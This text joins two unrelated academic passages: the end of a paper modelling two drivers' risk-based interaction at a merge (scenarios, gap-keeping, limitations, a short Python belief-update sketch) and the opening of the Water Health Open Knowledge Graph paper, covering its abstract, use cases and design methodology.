13.4, & 36.1 \(m\) for velocities below 60 \(km/h\) = 16.7 \(m/s\), and standard deviations of respectively 10.3, 12.8 & 18.2 (the headway is defined as the gap plus the leading vehicle length).
Figure 4: Model behaviour in scenario A (no expected collision). Line colours correspond to the vehicle colours in Figure 2. a) Positions of the left and right vehicles over time. The x positions of the vehicles are plotted with an offset to prevent the lines from overlapping after the merge point. The grey dots and dashed lines indicate vehicle positions at equal time stamps with an interval of 1.0 \(s\). b) Velocities of the vehicles over time. The stars indicate the moment when the simulated driver performed a re-plan because the upper risk threshold was exceeded, and a circle denotes a re-plan because the risk fell below the lower threshold. These re-plans are only triggered if the last re-plan was longer than \(\tau\) ago. c) Accelerations of the vehicles over time. d) Perceived risk of both simulated drivers. In case of a re-plan, the perceived risk after the re-plan is shown. The dashed horizontal lines in the lowest plots indicate the risk thresholds of the drivers. In this scenario, the drivers increased the small projected gap, even though they were initially not on a collision course. The simulated drivers behaved in a way to increase the initially narrow safety margin.
In the modelled outcome of scenario A (Figure 4), the left driver reached the merge point first.
They accelerated slightly to increase the safety margin at the merge point, after that, they returned to their preferred velocity. The headway when the second vehicle reached the merge point was 6.4 \(m\). This corresponds to the expected human behaviour, and can not be modelled with utility-maximization unless utility is explicitly awarded for keeping a gap. The right driver did not take any action in this scenario. The reason for that is highlighted in the risk perception plot. The left driver's risk increases earlier because it expects to reach the merge point earlier. This increase causes the left driver to take action to lower the risk, while the right driver can continue their plan without exceeding their risk threshold. The right driver's perceived risk also decreases as soon as the left driver takes action; they perceive that the conflict was resolved by the left driver. ### Scenario B: On a collision course In scenario B, the drivers have the same desired and initial velocities as in scenario A. However, the right vehicle starts with a 1.2 \(m\) head-start. Therefore, the projected positions of the two vehicles at the merge point overlap by 1.0 \(m\). Thus, if neither driver deviates from their desired velocity, this scenario will result in a collision. We would therefore expect that this scenario requires more severe action to be resolved than scenario A, but we do expect the model to avoid a collision. The modelled outcome of scenario B (Figure 5) shows that this scenario indeed requires more effort from both drivers to resolve the conflict compared to scenario A. Both drivers start braking until the left driver decides they can only reduce the risk of a collision by accelerating. This can be explained by the fact that the left driver has a slightly higher velocity at this point compared to the right driver. The right driver sticks to their plan and keeps decelerating until the risk drops below the lower threshold and the saturation time has passed, only then they accelerate again. This behaviour results in a safety margin between the vehicles that is not explicitly included in the reward function. Because the left driver is the first to accelerate, they reach the merge point first. This explainable interactive behaviour combined with the collision-free outcome can be regarded as a plausible human-like interaction. ### Summary Scenarios A and B In scenario A, the driver with the higher preferred velocity that approached the merge point first also passed the merge point first. But the distance gap between the vehicle was enlarged by the drivers. This corresponds to what we expected from human drivers. If the drivers approach the merge point with an expected collision (scenario B), however, the drivers take more drastic action but still manage to resolve the conflict by interacting with each other. ### Scenario C: High and low thresholds Scenario C represents a case where the simulated drivers of both vehicles have the same initial conditions and desired velocities, but different risk thresholds. Compared to the previous scenarios, the right driver has higher risk thresholds while the left driver has lower thresholds. The left driver, having lower thresholds, is expected to act early in the interaction to reduce their perceived risk. In terms of human behaviour, this would correspond to risk-averse, conservative driving. 
The right driver (high thresholds meaning higher tolerance to risk) is expected to react to a potential conflict at a later point and therefore to keep their velocity at the desired level longer. We expect that the right driver reaches the merge point first, and deviates less from their desired velocity compared to the left driver. The modelled outcome of scenario C (Figure 6) is as expected: the left driver reached their upper threshold first and started to decelerate to reduce the perceived risk. In terms of human driving, this can be seen as more conservative behaviour. The right driver reacts later because their risk threshold is exceeded at a later moment. They briefly decelerate, but quickly start to accelerate to reduce the risk since the left driver already decelerated. This results in the right driver reaching the merge point first and deviating less from their desired velocity than the left driver. This corresponds to the intuition that lower sensitivity to risk (i.e. higher risk thresholds) could be associated with more aggressive behaviour.
Figure 5: Model behaviour in scenario B. The simulated drivers prevent a collision by slowing down. Initially, they both slow down, but after approximately one second, the left (initially faster) driver speeds up and reaches the merge point first. For details of the notation, see the caption of Figure 4.
### Scenario D: Threshold sensitivity Scenario D investigates the sensitivity of the modelled drivers' behaviour to variations in the lower risk threshold. This scenario is the same as scenario C, with the only exception that the left driver has a slightly higher value for \(\rho_{l}\) (lower risk threshold). We, therefore, expect a very similar outcome in scenarios C and D. The only expected difference is that the left driver in scenario D re-plans more frequently because the risk for the new plan is constrained to the average of the two risk thresholds. With a smaller difference between \(\rho_{l}\) and \(\rho_{u}\), the absolute risk decrease at the re-plan points is smaller. This should cause the perceived risk to reach the upper threshold quicker and thus result in more frequent re-plan events. However, the model simulation results show major differences between scenarios C and D (Figures 6 & 7). As expected, the smaller difference between the left driver's low and high risk threshold resulted in more plan updates. But unexpectedly, this more frequent re-planning resulted in the left driver starting to accelerate and reaching the merge point first. To keep their perceived risk under control, the left driver deviated from their desired velocity to a larger extent than the right driver. This observation can be explained by the fact that high velocities and accelerations do not contribute to risk. The left driver takes whatever action is needed to keep the probability of a collision below their threshold (in this case, high acceleration and high velocity). The slight change in risk thresholds and more frequent re-plans resulted in one of the re-plans initially failing. This triggered a change in the left driver's high-level strategy: they accelerated instead of braking, and this heavily influenced the outcome.
Figure 6: Model behaviour in scenario C. The right driver maintains their initial velocity longer. After briefly decelerating, they accelerate and reach the merge point first. For details of the notation, see the caption of Figure 4.
### Summary Scenarios C and D In scenario C, the driver with the higher risk thresholds (the right driver) passed the merge point first. This driver changed their plan at a later moment compared to the other driver. In terms of human behaviour, this can be explained as being more aggressive. The effect of slight changes to the lower threshold was shown to be substantial in scenario D. A small change resulted in a different interaction strategy, making the theoretically more "conservative" left driver arrive at the intersection first. This more conservative driver used high velocities and accelerations to lower their perceived risk even though high velocities would be interpreted by many human drivers as high-risk behaviour. The reason for this seemingly counter-intuitive model behaviour is that the high velocities and accelerations on their own do not contribute to the perceived risk of these modelled drivers.
Figure 7: Model behaviour in scenario D. The slight change in \(\rho_{l}\) for the left driver (in comparison to scenario C) resulted in a major change in high-level outcome. Instead of the right driver, the left driver now reaches the merge point first. For details of the notation, see the caption of Figure 4.
### Emergent gap-keeping behaviour for car following Although the main focus of our model is on the interactive behaviour of the drivers when approaching the merging point, it also provides insight into their behaviour after the merging conflict is resolved. Specifically, in the four scenarios above, we found that the simulated drivers continued maintaining a gap on the straight section after the merge point. This behaviour was not explicitly programmed and the planner has no cost associated with short time or small distance gaps (a feature frequently used in human driver models [34, 35]). Instead, these distance gaps appear to emerge from the combination of risk perception and a probabilistic belief about the plan of the other driver. To further investigate this effect, we simulated a scenario without a merging point. In this scenario, the drivers drive behind each other on a straight stretch of road (\(400~{}m\)). We used the default parameters from Table 1, except for the velocity parameters. The leading vehicle has lower desired and initial velocities (\(9~{}m/s\)) compared to the following vehicle (\(10~{}m/s\)). Figure 8 shows that a steady-state gap emerges after approximately 100 meters. In this scenario, the leading driver mostly acts to reduce the risk and prevent a collision. Although the fact that the leading, not the following, driver mostly acts to maintain this gap is not uncommon for human drivers and has been observed under some conditions [36], it is not the most common behaviour for reducing the risk during car following [37]. We identified two causes for this model behaviour. First, the belief and risk perception in the model are purely symmetrical. There is no difference in risk between drivers that are in front or behind another, nor is there any difference in believed probability that a driver will accelerate or decelerate. In natural traffic this simplification will not hold; this should be accounted for when extending the model for use in those scenarios. Second, the risk thresholds of both drivers are equal in this example. It can be expected that in other situations, even under the previously mentioned assumption, the driver with the lower risk threshold will act to maintain the gap, as was seen in scenario C.
This can be either the leading or the following driver, as was observed in human behavior [36, 37]. We investigated the effect of absolute velocities on the resulting steady-state distance gap, where we take the average gap over the final second of simulation as the steady-state gap. We simulated the model behaviour in this scenario for different velocities, every time with a \(10~{}\%\) velocity difference between the drivers, and an initial time gap of \(1~{}s\). We found that the emerging steady-state gap increased linearly with increasing velocities (Figure 9). This corresponds to human behaviour: the same linear relationship has been previously observed in a study on human gap-keeping behaviour on highways with low speeds [38]. Our model explains this relationship between velocity and distance gap as follows: The leading driver (orange) is unsure about the future plan of the following driver (blue). It could be possible that the blue driver will accelerate in the near future; In this case, a collision can occur. Because the orange driver keeps its risk below a threshold, it will keep a distance from the blue driver to make sure that its plan does not overlap too much with the possible future positions of the blue driver. Higher velocities, with the same maximum comfortable acceleration, result in a high standard deviation in the belief points. This causes the gap size to increase with velocity. The mentioned study [38] also showed that humans keep larger gaps (approximately 12 \(m\) to 23 \(m\) for the same velocity range) compared to our model. We, therefore, conclude that the model qualitatively captures the underlying risk-mitigation mechanism in human car-following behaviour, but needs to be further explored to investigate if fitting the model parameters to human data would also allow it to capture the magnitude of the gap characteristic of human drivers. Figure 8: Model behaviour in the straight road scenario. For details of the notation, see the caption of Figure 4. The bottom panel shows the gap between the vehicles as a function of the leading vehicle position. In this scenario, the blue (following) vehicle has a higher preferred velocity than the orange (leading) vehicle. The x-axes have been cropped to the first 200 meters of the 400 meter track. ## 5 Discussion In this work, we have proposed a modelling framework for two-way human-human interactions in traffic. We illustrated the utility of the framework by implementing a concrete model based on the framework, targeted at interactive behaviour in a simplified merging situation. We investigated the model's behaviour in four scenarios, one where the drivers are not on a collision course, one where they are, and two where we investigated the effects of the model parameters. The model captures the actions of two drivers who 1) successfully resolve merging conflicts without collisions, 2) increase safety margins that are clearly too small (a \(20~{}cm\) gap) for human drivers, and 3) exhibit individual conservative and aggressive behaviour, based on physically meaningful model parameters: their risk thresholds. In all scenarios, the model behaves in a plausible way that corresponds to intuitions about human interactive behaviour in merging conflicts. Furthermore, from the model's underlying principle (the notion of risk combined with the probabilistic belief about the other driver's plan) plausible behaviour emerged outside of the situations we developed and tuned the model for. 
Specifically, a realistic gap-keeping behaviour emerged, where the drivers keep larger distance gaps at higher velocities, as humans do [38]. This behaviour was observed even though no distance or time gap-related costs are incorporated in the model. These results show that the proposed model framework is a promising novel approach for modelling two-way multi-agent interactions in traffic. Modelling interactions in traffic has both practical and fundamental applications. In practice, a modelling framework like the one we propose could aid the development of autonomous vehicle controllers that aim to increase acceptability and safety in interactive scenarios. More fundamentally, such modelling, even when limited to an isolated traffic scenario, could contribute to gaining fundamental knowledge of human behaviour by highlighting the cognitive mechanisms humans use when interacting with each other. Our novel framework addresses the limitations of existing modelling and control approaches, among which game-theoretic models and interaction-aware controllers, because it explicitly incorporates communication and two-way interaction. Furthermore, our model framework does not make strong assumptions about human behaviour, such as the assumption that humans are rational utility maximizers. We hope that the initial exploration of the model framework presented here can spark a new strain of interaction modelling research.
Figure 9: Steady-state gap sizes (averaged over the last second) on a straight road where the following vehicle has a higher preferred velocity. The velocity difference between the vehicles is \(10\%\) and the initial time gap is \(1~{}s\).
### Similar Approaches Among existing approaches to modelling traffic interactions, by far the most explored one is game theory. For example, for an extensive review of game-theory-based lane-changing models, see [39]. What is similar to our framework is that game theory aims at modelling two-way interactions instead of modelling only one driver responding to another (for examples, see [14, 15, 16, 17, 13, 12]). What is different is that our approach is not limited by two main assumptions (rationality and lack of communication) nor, for the majority of game-theoretic approaches, by a focus on decision-making without describing operational behaviour. Finally, and more conceptually, game-theoretic models implicitly approach traffic interactions as a competition, while in our framework the agents have a joint primary objective (interaction safety) that makes the interaction a joint, cooperative effort. In contrast with game theory, our approach explicitly incorporates communication between drivers. Although there are similarities with game theory (for example, our case study uses the same modality of communication as many game-theoretical approaches: position and velocity observations; e.g., [13, 40], for an overview, see [39]), there are two fundamental distinctions in how we approach communication with respect to game theory. First, the communication in our framework allows drivers to construct and update a belief about the other vehicle's plan without the need for any prior information about the other driver. This is a fundamental contrast with game theory, where players are assumed to know each other's utility functions (at least partially) beforehand. Therefore, in game theory, communication is not necessary because players can reason about what the other player is going to do to maximize their utility given the current state.
The observations of position and velocity are only used to determine the state of the world, while in our model, position and velocity are used to convey information about the intention of other drivers. Second, in game theory, observations are not "remembered". They only serve to determine the current state, which is enough to reason about the other players' actions. Previous states are irrelevant. This is also known as the Markov condition or assumption. In our work, in contrast, the history of communication is kept in the belief about the other driver's intentions. Thus, the belief about a driver's future actions is based on its recent behaviour, not only on the current state. Some approaches combine game theory with an online estimation of the other player's utility function, thereby indirectly basing the belief about future actions (which directly depends on the utility function) on recent behaviour (e.g., [41, 35]). However, in these approaches, the conveyed information is not regarded as intentional communication. Furthermore, these approaches only estimate part (e.g., a single parameter) of the utility function online; the rest is assumed to be known a priori. Another modelling concept that bears resemblance to our approach is that of _Belief-Desire-Intent (BDI) modelling_. BDI modelling is based on the philosophical work of Bratman [31] and models single agents that have a belief, a desire (goal), and an intent (plan). Many implementations of BDI models have been proposed for different applications [42]. The BDI framework and our CEI framework share the concepts that agents construct a (probabilistic) belief about other agents and the world, and then make a plan based on that belief to reach a final goal. The BDI framework, however, was not intended to account for interactions. It is primarily a model framework for individual agents that perform individual tasks. It therefore also does not incorporate communication but instead updates its beliefs based on changes that occurred in the world. Finally, an important concept that can be complementary to the CEI-model framework, and that bears resemblance to the BDI framework, is the concept of _Theory of Mind (ToM)_[43] (for examples of applications to human-robot interaction, see [44, 45]). ToM is a psychological concept that assumes humans have an internal model of the beliefs, goals, and intentions of other humans in an interaction. This gives them the ability to reason about what other humans want and how they will try to achieve that goal. This idea that humans understand the mechanisms behind the actions and beliefs of others could be used in an implementation of our proposed CEI-model framework, which, in principle, only requires humans to form a basic belief about the future movements of others. As an example, the implementation of the CEI-model in the case study assumes drivers predict where the other driver is going, not why they are doing that. A complete ToM model could extend this belief about future actions of the other, with beliefs about their beliefs and goals. Implementing a CEI-based model with an internal ToM model is an interesting avenue for future research. Besides these different types of modelling approaches, recently a great deal of effort was put into approaches for controlling (autonomous) vehicles in merging scenarios (e.g. [35, 41, 46]). Although the underlying techniques (such as finding a policy by optimizing some utility function) can be similar, the goal of these approaches is very different.
While modelling approaches (such as ours) aim to best describe human behaviour. Control approaches aim to find a safe and optimal solution to a control problem. Game theory can therefore be very suitable for use in control approaches (as was done in [35, 41, 47]). Two recent works on modelling come close in scope to this work. In 2022, Markkula et al. proposed a modelling approach for individual agents in a driver-pedestrian interaction rather than multiple agents in a driver-driver interaction [48]. Using different versions of a model that incorporates a variety of concepts from psychology, with varying levels of complexity, they conclude that "modelling of human road user interaction is a formidable challenge". Similar to our work, their findings suggest that the problem cannot be solved with simple rational models. Besides that, accounting for specific, previously unexplained, phenomena observed in human interactive behaviour could only be done using complex cognitive models. These conclusions resonate with our argument that the development of new model frameworks that go beyond game theory and the assumption of one-way interaction is a necessary step to improve our understanding of human traffic interactions. Secondly, in 2014, Wan et al. also proposed an approach to model vehicle-vehicle interactions on merging ramps [49]. As in our work, they specifically address the influence vehicles have on each other. Their (and our) work, therefore, differs from traditional driver models that usually describe a single driver responding to - but not influencing - other traffic. Another similarity between our proposed framework and the work by Wan et al. is that we both explicitly consider communication between vehicles. However, the model proposed by Wan et al. specifically targets congested traffic and uses different mathematical models for vehicles that have different roles in the interaction (i.e., they determine who will lead, follow, and merge a priori). Wan et al. also do not consider individual differences between drivers. ### Framework Extensions Although we have only demonstrated our proposed model framework for a simple merging scenario with two vehicles, it could easily be extended to more vehicles or traffic interactions with other types of participants. The underlying reason is that while we put the model's bounding box around the complete interaction, the drivers within the model are strictly separated; the only component connecting the two drivers is communication (Figure 1). This has two main advantages. First, communication in our framework is based on observable signals (e.g., turn indicators or velocity). This means that sending and receiving communication can easily be shared between multiple drivers, i.e., the communication is broadcast to all surrounding road users rather than sent directly to one of them. For that reason, the model framework can be extended to any number of drivers without requiring a redesign. Second, because the drivers are separated, it is possible to swap one of the drivers in the model with another type of agent, for example, a pedestrian. This would require adding the agent type to the observed communication, but since this is also an observable feature, it would not make the model more complex. One could even go as far as replacing one of the agents in the model with a non-model agent altogether. 
This could, for example, be used to let a real human interact with the model in a driving simulator (this would require an optimized model implementation capable of running in real-time). This in turn would allow for the possibility of human drivers subjectively evaluating the ability of the model to describe natural interactions. Alternatively, a model could be used to evaluate autonomous vehicle controllers by letting the model interact with such a controller. Another potential extension useful for AV development is integrating the model into an AV controller to help it make decisions with an online evaluation of potential outcomes of an interaction. We believe our model could also be adapted to other types of human-human interaction tasks. An example of such a task is cooperative bottle reaching, for which a communication model was developed in [29]. The task in [29] is similar to our task in that it constitutes a joint effort for which communication and action take place along the same channel (velocity/acceleration in our case). The main difference between our model framework and the communication model in [29] is that we target the interaction dynamics, in which we assume communication plays an important role, instead of targeting to model the communication as a stand-alone feature. ### Limitations and Future Work Both the specific model implementation and the general modelling framework have important limitations. To start with the former, the model used for the simplified merging scenario uses very simplistic implementations for all components. The plan is based on desired velocity and acceleration alone. The beliefs are one-dimensional and assumed to be Gaussian distributions. The communication is assumed to be perfect (continuous without any noise), and only based on implicit cues. And finally, the risk is only based on collision avoidance, not influenced by high velocities or accelerations. In future implementations of the model, these limitations need to be addressed. However, it is important to first identify which of these limitations (if any) play a role in the model's ability to accurately reproduce human-human interactions. This could be done by comparing the model to data on human-human interactions gathered in a driving simulator experiment. Another limitation of the current model implementation lies in the updates of the belief function. The assumption that the likelihood function (used for the Bayesian updates) has a known and fixed standard deviation results in the fact that every update reduces the standard deviation of the posterior, even if the new information contradicts the current belief. This is counter-intuitive: contradicting information (incoming through communication) should increase the variability of the belief, not decrease it. Put differently, if another person or driver sends unclear communication about what they are going to do by alternating between accelerating and braking, one should keep all options open, not decrease the standard deviation of the predicted position after a couple of seconds while shifting the mean around on every time step. How to properly address this limitation remains an open question. Finally, the model's satisficing-based decision-making can result in unstable outcomes for high-conflict scenarios. When re-planning, the drivers in the model will first search for a new solution close to the previous solution. 
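This effect is easy to demonstrate numerically. The sketch below is not the implementation used in the case study; it merely applies the standard conjugate update for a Gaussian belief under a Gaussian likelihood with fixed, known standard deviation, using illustrative numbers, to show that the posterior keeps narrowing no matter how contradictory the incoming observations are.

```python
import math

def gaussian_belief_update(prior_mean, prior_std, observation, likelihood_std):
    """Conjugate update of a Gaussian belief given one observation with a
    Gaussian likelihood whose standard deviation is fixed and known."""
    prior_var, lik_var = prior_std ** 2, likelihood_std ** 2
    post_var = 1.0 / (1.0 / prior_var + 1.0 / lik_var)  # does not depend on the observation
    post_mean = post_var * (prior_mean / prior_var + observation / lik_var)
    return post_mean, math.sqrt(post_var)

# Illustrative belief about the other driver's predicted position a few seconds ahead.
mean, std = 50.0, 10.0
for obs in [80.0, 20.0, 80.0, 20.0]:  # "communication" that keeps contradicting the belief
    mean, std = gaussian_belief_update(mean, std, obs, likelihood_std=10.0)
    print(f"posterior mean = {mean:5.1f}, posterior std = {std:4.2f}")
# The std shrinks monotonically (7.07, 5.77, 5.00, 4.47) while the mean jumps around,
# i.e. the belief becomes ever more confident despite the contradictory evidence.
```

Returning to the satisficing-based re-planning mentioned above, in which drivers first search close to the previous solution: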
For example, if the previous plan was to brake, the driver will first explore if braking harder will satisfy the new constraint. Only if this optimization fails, the driver will explore other strategies (i.e., acceleration) to lower the perceived risk. This drastic change in high-level behaviour is thus triggered by the first optimization failing. Therefore, slight numerical or temporal differences in this optimization can lead to different high-level outcomes, especially for situations that are highly symmetrical (e.g., when drivers have very similar parameters and none of the vehicles has a clear kinematic advantage). This was already observed in scenario D, where a slight change in model parameters caused a different outcome, but a similar outcome change could also result from changes in the type of numerical optimization solver or its parameters. One way of addressing this sensitivity is to make the model stochastic: introducing variability in the model's behaviour will make the outcome in high-conflict scenarios inherently stochastic and therefore could help to make it less sensitive to small external perturbations. Adding stochasticity also addresses the main limitation of the overall framework, which is that currently, the framework is fully deterministic: with the exact same parameters (for model and solver), the model will always produce the same behaviour. This is inconsistent with the substantial behavioural variability that humans exhibit in traffic [50]. We see multiple possible ways of introducing stochasticity in the framework to account for this. To name two: adding stochasticity could be done in the receiving of communication (translating perceptual information to an updated belief) by using evidence accumulation mechanisms [10] or additive noise, or by including noise directly in the risk perception. However, more work is needed to determine the best approach. A second limitation of the overall framework concerns improvements and redesigns of the model. Although the different components in the framework are separated, which should allow for easy redesign of parts of the model, they do depend on each other. This could mean that when redesigning one aspect of the model, a redesign of another aspect is inevitable. As an example, in the case study, we used velocity and position as the means of communication. These values are directly used in the belief update. However, if we would change the communication component of the model, the belief and its update also need to be changed. This is an important consideration when starting a redesign of the model since this could be the case for more components. Finally, event-based triggering of the re-plan based on perceived risk results in an uneven computational requirement from the model: some time steps may take significantly more time to compute than others. A result of this is that our current implementation of the model cannot run in real-time. Instead, we used offline simulation for the case study. This could pose a problem when an experiment needs to be performed where the model interacts directly with a human. Although the presented case study shows promising results, there is much future work to be done on the proposed framework. In addition to accounting for stochasticity in human behaviour and optimizing the runtime performance of the model, a necessary next step is to compare the model to human-human interactive behaviour. 
However, even validating single-driver models that do not incorporate interactions is already a complex task [51]; therefore, comparing our model to human-human interaction data requires a separate, detailed investigation.

## 6 Conclusion

In this paper, we proposed a novel framework for modelling human-human driving interactions. The key insight underlying this framework is the focus on the joint behaviour of the drivers during the interaction, rather than the isolated behaviour of a single driver. The framework explicitly includes communication between drivers and mutual influences (two-way interaction). We implemented the model for a simplified merging scenario and investigated its behaviour in four scenarios. We conclude the following:

* The model avoids impending collisions via plausible driver-driver interactive behaviours;
* Changing the risk threshold parameters per driver results in changes in behaviour that can be interpreted as more aggressive or conservative;
* Velocity-dependent gap-keeping behaviour emerges from the combination of risk-based planning and a probabilistic belief about other drivers' plans. With this behaviour, the model shows a fundamental aspect of human driving behaviour without it being explicitly programmed;
* The proposed model framework is a promising novel approach for modelling two-way multi-agent interactions in traffic.

## Acknowledgement

The authors thank Nissan Motor Co. Ltd. for funding this work.
2305.11051
The Water Health Open Knowledge Graph
Recently, an increasing interest in the management of water and health resources has been recorded. This interest is fed by the global sustainability challenges posed to the humanity that have water scarcity and quality at their core. Thus, the availability of effective, meaningful and open data is crucial to address those issues in the broader context of the Sustainable Development Goals of clean water and sanitation as targeted by the United Nations. In this paper, we present the Water Health Open Knowledge Graph (WHOW-KG) along with its design methodology and analysis on impact. WHOW-KG is a semantic knowledge graph that models data on water consumption, pollution, infectious disease rates and drug distribution. The WHOW-KG is developed in the context of the EU-funded WHOW (Water Health Open Knowledge) project and aims at supporting a wide range of applications: from knowledge discovery to decision-making, making it a valuable resource for researchers, policymakers, and practitioners in the water and health domains. The WHOW-KG consists of a network of five ontologies and related linked open data, modelled according to those ontologies.
Gianluca Carletti, Elio Giulianelli, Anna Sofia Lippolis, Giorgia Lodi, Andrea Giovanni Nuzzolese, Marco Picone, Giulio Settanta
2023-05-18T15:43:00Z
http://arxiv.org/abs/2305.11051v1
# The Water Health Open Knowledge Graph

###### Abstract

Recently, an increasing interest in the management of water and health resources has been recorded. This interest is fed by the global sustainability challenges posed to the humanity that have water scarcity and quality at their core. Thus, the availability of effective, meaningful and open data is crucial to address those issues in the broader context of the Sustainable Development Goals of clean water and sanitation as targeted by the United Nations. In this paper, we present the Water Health Open Knowledge Graph (WHOW-KG) along with its design methodology and analysis on impact. WHOW-KG is a semantic knowledge graph that models data on water consumption, pollution, infectious disease rates and drug distribution. The WHOW-KG is developed in the context of the EU-funded WHOW (Water Health Open Knowledge) project and aims at supporting a wide range of applications: from knowledge discovery to decision-making, making it a valuable resource for researchers, policymakers, and practitioners in the water and health domains. The WHOW-KG consists of a network of five ontologies and related linked open data, modelled according to those ontologies.

Keywords: Knowledge Graph; Semantic Web; Linked Open Data; Water Quality; Health; Environmental Data; Clean Water and Sanitation

## 1 Introduction

Interest in water and sanitation management has grown in recent years, driven by global sustainability challenges that prioritise, among others, clean water and sanitation, as outlined in the UN Sustainable Development Goals5. To provide effective responses to these global issues, the availability of high-quality and open data becomes an essential requirement. However, the heterogeneity and complexity of water and health data, when available, can pose significant challenges. Not only is the data heterogeneous both in format and in semantics, but it mostly does not guarantee FAIRness at any level: it is not findable, and thus neither accessible nor interoperable. There may also be no licenses specified for enabling a direct reuse of the data. In response, only a few ontological modelling solutions have emerged to represent this fragmented knowledge within a FAIR framework, aiming to cater to the need for coverage of heterogeneous datasets in the international landscape. This paper introduces the Water Health Open Knowledge Graph (WHOW-KG), which is the first European open distributed knowledge graph aimed at linking, using a common semantics, data on water consumption and quality with health parameters (e.g., infectious disease rates, general health conditions of the population). Designed to understand the impact of water-related climate events, water quality, and water consumption on health, it provides a harmonized data layer that can be re-used for analysis, research, and development of innovative services and applications. The project's primary driver was to establish a sustainable methodology for open knowledge graph production to ensure the data quality characteristics of authoritativeness, timeliness, semantic accuracy, and consistency, as well as metadata compliance with the European DCAT-AP profile6 and related national and thematic extensions. Footnote 6: [https://joinup.ec.europa.eu/collection/semantic-interoperability-community-semic/solution/dcat-application-profile-data-portals-europe/release/11](https://joinup.ec.europa.eu/collection/semantic-interoperability-community-semic/solution/dcat-application-profile-data-portals-europe/release/11). 
The WHOW-KG is still under development and currently consists of more than 100 million triples from 19 selected datasets according to three use cases. The WHOW-KG is distributed and it is available via three SPARQL endpoints: two endpoints available from two data providers (Lombardy Region and the Italian National Institute of Environmental Research (ISPRA)) and one endpoint from the Institute of Cognitive Sciences and Technologies of CNR (ISTC-CNR). All the resources from Lombardy Region are licensed under the Creative Commons Public Domain License (CC0) and the ones from ISPRA under the Creative Commons Attribution 4.0 International (CC-BY 4.0) license. In summary, this paper presents the following contributions:

* The WHOW-KG and an analysis of its impact.
* A design methodology to support data providers' publication of Linked Open Data that is highly extensible and sustainable.
* An analysis of the five WHOW ontologies, including a review of the state of the art in terms of similar works in both the water and health domains.

The rest of the paper is organized as follows: (i) Section 2 discusses the design methodology; (ii) Section 3 addresses the results achieved in terms of the ontology network and produced Linked Open Data; (iii) Section 4 discusses the impact of the WHOW-KG; (iv) Section 5 presents the related work; finally, (v) Section 6 concludes the paper, discusses the limitations, and defines future directions of research.

## 2 Material and method

The WHOW-KG was developed to cope with three selected use cases identified in the context of the WHOW project with domain experts and data providers. Those use cases are: (i) Contaminants in marine waters (UC1), (ii) Water quality and for human consumption (UC2), and (iii) Meteorological extreme events (UC3). The first use case, i.e. Contaminants in marine waters, aims at modelling ontologies and creating linked open data on human exposure to chemicals and biological contaminants in marine waters, ingestion of contaminated fish products, and airborne exposure, such as Ostreopsis Ovata7. The second use case, i.e. Water quality and for human consumption, focuses on generating ontologies and linked open data for modelling and representing the quality of surface and ground waters as well as drinking water quality parameters and values, measured in compliance with the EU Directive 2020/21848 on the quality of water intended for human consumption. Finally, the third use case, i.e. Meteorological extreme events, is about modelling ontologies and linked open data for representing meteorological phenomena, alteration of the hydrological cycle and agriculture industries. More details about the use cases can be found by interested readers in a public deliverable [16] of the project. Footnote 7: Ostreopsis Ovata is a well-known genus of free-living dinoflagellates found in marine environments that is frequently associated with phenomena of human intoxication. Footnote 8: [https://eur-lex.europa.eu/eli/dir/2020/2184/oj](https://eur-lex.europa.eu/eli/dir/2020/2184/oj).

### Material

The aforementioned use cases were defined along with the identification of pertinent core open datasets by means of a co-creation programme organised within the scope of the WHOW project. Hence, 77 participants actively contributed to the programme. The group of co-creators included domain experts, stakeholders, practitioners, and data providers from both public and private organisations located in the EU. 
The full list of datasets identified can be consulted in a corresponding project deliverable [3]. From this list, we selected high-priority datasets that are currently used for designing and generating the WHOW-KG. The selection was done in compliance with the following criteria: (i) relevance to the use cases; (ii) open licence associated with the dataset; and (iii) data availability for the years spanning mainly from 2018 to 2021. For some datasets, the time period is even longer, spanning from 1999 to 2023. In general, the 2018-2021 reference time span is a requirement defined by the project and by the contributors of the co-creation programme. The identified datasets are reported in Table 1 with an identifier, short description, data format, right holder, supported use case, and number of records. By number of records we mean the number of rows and triples for CSV and RDF data sources, respectively.

| ID | Description | Format | Right holder | Use case | # of records |
| --- | --- | --- | --- | --- | --- |
| D1 | Analytical data of river water bodies, including … | CSV | ARPA Lombardia | UC2 | 1 060 320 |
| D2 | Analytical data of lake water bodies | CSV | ARPA Lombardia | UC2 | 136 085 |
| D3 | Analytical data of groundwater | CSV | ARPA Lombardia | UC2 | 591 389 |
| D4 | Height of the lakes | CSV | ARPA Lombardia | UC2 | 5 480 |
| D5 | Infectious diseases rates by sex and age | CSV | Regione Lombardia | UC2 | 11 435 |
| D6 | Ostreopsis ovata | CSV | ISPRA | UC1 | 1 222 |
| D7 | Repertory of mitigation measures for National … | RDF | ISPRA | UC3 | 1 286 758 |
| D8 | Soil consumption indicators | RDF | ISPRA | UC3 | 1 625 802 |
| D9 | Meteo observations and weather stations (for October 2019 of 8 geographical Lombardy areas) | | | | |

Table 1: Datasets selected for the creation of the WHOW-KG.

### Method

The methodology we used for constructing the WHOW-KG is inspired by the one defined in [6] and relies on eXtreme Design [2] (XD) for ontology modelling. XD emphasises the reuse of ontology design patterns [12] (ODPs) within an iterative and incremental process. More interestingly, XD is a collaborative methodology that fosters the cooperation among multiple actors with different roles (e.g. knowledge engineers, domain experts, etc.) to make sure all the modelling requirements are first captured and then effectively covered. Hence, we opted for XD since it fits our collaborative setting based on the co-creation programme. Furthermore, there is evidence in the literature [1] that the reuse of ODPs (i) speeds up the ontology design process, (ii) eases design choices, (iii) produces more effective results in terms of ontology quality, and (iv) boosts interoperability. Figure 1 shows the methodology implemented for constructing the WHOW-KG.

_Ontology design._ In such a figure, the activities named _requirement collection_, _test design_, _ontology module development_, and _ontology testing_ come from XD and focus on ontology design. The requirement collection activity aims at eliciting the requirements as _competency questions_ [13] (CQs). CQs are natural language questions conveying the ontological commitment expected from a knowledge graph (KG) and drive both ontology modelling and validation. In fact, on the one hand CQs are a means for ontology development. On the other, they can be converted to formal queries in order to assess the effectiveness of the resulting KG to cope with the requirements. 
